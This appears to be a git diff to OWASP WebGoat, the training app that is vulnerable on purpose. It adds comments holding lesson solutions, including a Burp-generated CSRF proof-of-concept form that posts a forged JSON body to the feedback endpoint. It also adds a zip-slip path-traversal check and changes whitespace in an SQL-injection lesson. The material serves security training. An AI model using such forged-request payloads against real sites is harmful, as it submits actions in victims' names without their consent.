diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
index 4f4beb91a..83ff19850 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -112,10 +112,23 @@ private boolean requestContainsWebGoatCookie(Cookie[] cookies) {
     return false;
   }
 
-  /**
+  /** error solution
    * Solution <form name="attack" enctype="text/plain"
    * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input
    * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service",
    * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script>
    */
+
+    /** correct solution
+     * <html>
+     *   <!-- CSRF PoC - generated by Burp Suite Professional -->
+     *   <body>
+     *   <script>history.pushState('', '', '/')</script>
+     *     <form action="http://mob.exp:8080/WebGoat/csrf/feedback/message" method="POST" enctype="text/plain">
+     * 			<input type="hidden" name='{"name":"WebGoat","email":"webgoat@webgoat.org","content":"WebGoat is the best!!","null":"' value='"}'>
+     * 			<input type="submit" value="Submit request" />
+     *     </form>
+     *   </body>
+     * </html>
+     */
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
index 49c7b15c3..a0ccf6081 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
@@ -71,6 +71,27 @@ private AttackResult processZipUpload(MultipartFile file) {
       while (entries.hasMoreElements()) {
         ZipEntry e = entries.nextElement();
         File f = new File(tmpZipDirectory.toFile(), e.getName());
+
+          // 防止路径穿越
+          String canonicalDestinationDir = tmpZipDirectory.toFile().getCanonicalPath(); // 获取上传目录
+          String canonicalDestinationFile = f.getCanonicalPath(); // 获取上传的文件路径
+
+          if (!canonicalDestinationFile.startsWith(canonicalDestinationDir + File.separator)) {
+              throw new SecurityException("Entry is outside of the target dir: " + e.getName());
+          }
+
+          // 如果条目是目录，则创建目录
+          if (e.isDirectory()) {
+              f.mkdirs();
+              continue;
+          }
+
+          // 确保父目录存在
+          File parentFile = f.getParentFile();
+          if (parentFile != null) {
+              parentFile.mkdirs();
+          }
+
         InputStream is = zip.getInputStream(e);
         Files.copy(is, f.toPath(), StandardCopyOption.REPLACE_EXISTING);
       }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
index fbe551427..cab3f4cc7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
@@ -38,7 +38,7 @@
 public class SqlInjectionLesson10a extends AssignmentEndpoint {
 
   private String[] results = {
-    "getConnection", "PreparedStatement", "prepareStatement", "?", "?", "setString", "setString"
+        "getConnection", "PreparedStatement", "prepareStatement", "?", "?", "setString", "setString"
   };
 
   @PostMapping("/SqlInjectionMitigations/attack10a")